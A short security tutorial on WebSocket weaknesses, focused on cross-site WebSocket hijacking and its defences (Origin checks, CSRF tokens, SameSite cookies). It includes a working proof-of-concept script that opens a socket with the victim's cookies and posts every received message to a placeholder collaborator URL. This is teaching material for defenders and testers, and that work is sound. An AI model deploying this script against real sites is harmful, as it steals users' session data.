What is WebSocket
WebSocket is a communication protocol that provides a full-duplex, bidirectional channel over a single, long-lived TCP connection between a client (usually a web browser) and a server. Unlike traditional HTTP, which follows a request-response model, WebSockets allow real-time data exchange without repeated requests. The connection is set up by an ordinary HTTP GET request carrying an `Upgrade: websocket` header (the handshake); the browser attaches cookies to that request exactly as it would to any other HTTP request, which is what makes the attack below possible.
Exploits
WebSocket is exposed to many of the same issues as HTTP: the handshake is a plain HTTP request, so it is open to CSRF-style attacks when authentication relies on cookies alone; the messages carry untrusted user input, so injection and access-control flaws apply to them just as to HTTP parameters; and traffic is unencrypted unless `wss://` is used. These vulnerabilities usually arise from improper implementation or missing controls, which is why authenticating the handshake, checking the `Origin` header and a CSRF token, using TLS (`wss://`), and validating every message are needed for secure communication.
# Cross-site WebSocket hijacking (lack of CSRF protection)
Cross-site WebSocket hijacking (CSWSH) is CSRF against the WebSocket handshake. If the server authenticates the handshake using only the session cookie and neither checks the `Origin` header nor requires an unpredictable token, any page the victim visits can open a WebSocket to the target: the browser attaches the victim's cookies to the handshake, and the attacker's script can then send and read messages as the victim. The following code, hosted on an attacker-controlled page, relays everything the server sends over the socket to a collaborator (`your-websocket-url` and `your-collaborator-url` are placeholders to replace; `READY` stands for whatever first message the target application expects):

```html
<script>
// Open the socket to the target; the victim's browser adds its cookies to the handshake.
var ws = new WebSocket('wss://your-websocket-url');
ws.onopen = function() {
  // Application-specific message that makes the server start sending data.
  ws.send("READY");
};
ws.onmessage = function(event) {
  // Exfiltrate each message; mode 'no-cors' keeps the browser from blocking the POST.
  fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
```

This only works while the victim is logged in and the session cookie is actually sent cross-site: a cookie with `SameSite=Lax` or `SameSite=Strict` is not attached to a WebSocket opened from another site, and Chromium-based browsers treat cookies without a `SameSite` attribute as `Lax`, so in practice the cookie must have been set with `SameSite=None`.